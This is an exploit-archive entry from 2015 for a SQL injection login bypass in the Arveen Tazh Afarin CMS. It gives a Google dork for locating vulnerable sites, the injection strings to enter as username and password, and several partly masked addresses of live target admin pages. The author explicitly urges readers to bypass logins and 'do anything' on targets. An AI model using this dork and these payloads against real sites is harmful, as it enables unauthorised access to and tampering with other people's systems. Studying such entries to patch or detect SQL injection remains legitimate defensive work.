rveen Tazh Afarin CMS Login page Bypass Vulnerability

2015.11.09

Credit: Guardiran Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:Powered & design by ARVEEN TAZH AFARIN

########################################################
# Exploit Title: Arveen Tazh Afarin CMS Login page Bypass Vulnerability
########################################################
# Google Dork: intext:Powered & design by ARVEEN TAZH AFARIN
# Date: [08/11/2015]
# Exploit Author: Guardiran Security Team =>DeMoN
# Vendor Homepage: [http://arveentazh.en.ec21.com/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.You Have To Enter This Dork And Bypass The Login Page And Do Anythink In Your Target.
########################################################
# Username : &#039;=&#039; &#039;or&#039;
#
# Password : &#039;=&#039; &#039;or
#######################################################
# Demo:
# http://roudbaXrak.com/modir.php
# http://ariasaXyan.ir/modir.php
# http://atouXrs.ir/modir.php
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

rveen Tazh Afarin CMS Login page Bypass Vulnerability

Dork: intext:Powered & design by ARVEEN TAZH AFARIN

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.